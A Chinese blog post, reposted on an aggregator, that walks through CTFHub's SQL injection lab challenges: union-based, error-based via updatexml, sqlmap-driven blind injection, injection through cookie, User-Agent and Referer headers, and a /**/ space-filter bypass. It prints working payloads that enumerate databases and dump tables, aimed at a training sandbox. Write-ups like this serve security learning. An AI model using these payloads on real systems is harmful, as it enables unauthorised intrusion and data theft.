首页 > 数据库> 文章详细

CTFHub-web(SQL注入)

2021-12-04 23:32:50 阅读：240 来源： 互联网

标签：web name CTFHub union flag concat SQL id select

文章目录

整数型注入
字符型注入
报错注入
布尔盲注
时间盲注
Mysql结构
Cookie注入
UA注入
Refer注入
过滤空格

整数型注入

按照提示，我们输入1
在这里插入图片描述然后输入

1 order by 2

发现order by 3无法正常回显，证明存在两列
在这里插入图片描述

然后我们使用联合查询语句

-1 union select 1,2

在这里插入图片描述
我们开始爆库

-1 union select 8,database()

在这里插入图片描述
但我们爆表的时候发现出现错误，我们可以把表名转化为16进制,这里需要有火狐的hacker插件

在这里插入图片描述

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x73716c69

然后我们执行
在这里插入图片描述
然后我们爆字段

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x666c6167

在这里插入图片描述
然后我们查询flag

-1  union select 1,flag from sqli.flag

在这里插入图片描述
即可通关

字符型注入

我们输入

/?id=1'

页面回显在这里插入图片描述
我们将最后一个引号注释掉–+
发现可以正常回显

/?id=1'--+

在这里插入图片描述
然后我们跟第一关的步骤一样即可通关

查看列数
/?id=1' order by 1,2 --+
用联合查询语句
/?id=-1' union select 1,2 --+
查看库
/?id=-1' union select 1,database() --+
查看表
/?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x73716c69 --+
查看字段
/?id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x666c6167--+
爆字段
/?id=-1' union select 1,flag from sqli.flag --+

在这里插入图片描述得到flag

报错注入

我们尝试输入

/?id=1

在这里插入图片描述
回显没有问题

/?id=1'

在这里插入图片描述
显示查询错误
我们可以使用语句updatexml，大家可以在网上查找相关资料和用法
我们查看库

/?id=1 and updatexml(1,concat(0x5e,database()),1)

然后我们查看表

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69),0x5e),1)

查看字段

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167),0x5e),1)

然后查看字段flag的值

/?id=1 and updatexml(1,concat(0x5e,(select flag from sqli.flag),0x5e),1)

在这里插入图片描述用语句

/?id=1 and updatexml(1,concat(0x5e,mid((select flag from sqli.flag),32),0x5e),1)

即可找到没有显示出来的值
得到完整的flag

布尔盲注

这道题我们使用sqlmap来进行爆破
首先输入

python sqlmap.py -u"http://challenge-fa8f88f443f54784.sandbox.ctfhub.com:10800/?id=1" -batch -dbs

这里python sqlmap.py -u"url" -batch是基本的注入框架，“-dbs”指向数据库。
运行结果
在这里插入图片描述
然后我们输入

python sqlmap.py -u"http://challenge-fa8f88f443f54784.sandbox.ctfhub.com:10800/?id=1" -batch -D"sqli" -tables

-D是数据库，“-tables”指向爆破表名。
运行结果
在这里插入图片描述然后我们输入

sqlmap.py -u"http://challenge-fa8f88f443f54784.sandbox.ctfhub.com:10800/?id=1" -batch -D"sqli" -T"flag" -columns

-T是表名，-columns是爆破列名
运行结果
在这里插入图片描述
然后我们输入

sqlmap.py -u"http://challenge-fa8f88f443f54784.sandbox.ctfhub.com:10800/?id=1" -batch -D"sqli" -T"flag" -C"flag" -dump

-dump是爆数据，成功得到flag
在这里插入图片描述

时间盲注

我们使用sqlmap，跟上一关的方法相同。
在这里插入图片描述

Mysql结构

与上一关一样，用sqlmap跑，不一样的是表名，列名不太一样
爆库
在这里插入图片描述库名
爆表
表名

爆列

列名

在这里插入图片描述
爆字段
得到flag

Cookie注入

这关我们用burp抓包尝试，发现注入点
在这里插入图片描述爆库
爆表爆列
爆字段
发现flag

UA注入

这关提示ua注入，我们打开burp抓包尝试
在ua处输入

11 union select 1,database()

得到库名
在这里插入图片描述然后爆表
爆列

爆字段

得到flag

Refer注入

同样用burp抓包，发到重发器，然后在头部添加referer信息
在这里插入图片描述即可找到注入点
同样，爆库，爆表
爆列
爆字段
找到flag。

过滤空格

此处过滤的方法为/**/，将所有空格替换即可

输入

-1/**/union/**/select/**/1,database()

在这里插入图片描述

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=0x73716c69

在这里插入图片描述

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x7378627379796d627771

在这里插入图片描述

-1/**/union/**/select/**/1,zzymanwqkx/**/from/**/sxbsyymbwq

在这里插入图片描述
得到flag

标签：web,name,CTFHub,union,flag,concat,SQL,id,select
来源： https://blog.csdn.net/qq_49502930/article/details/121585879

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

ICode9

CTFHub-web(SQL注入)

文章目录

整数型注入

字符型注入

报错注入

布尔盲注

时间盲注

Mysql结构

Cookie注入

UA注入

Refer注入

过滤空格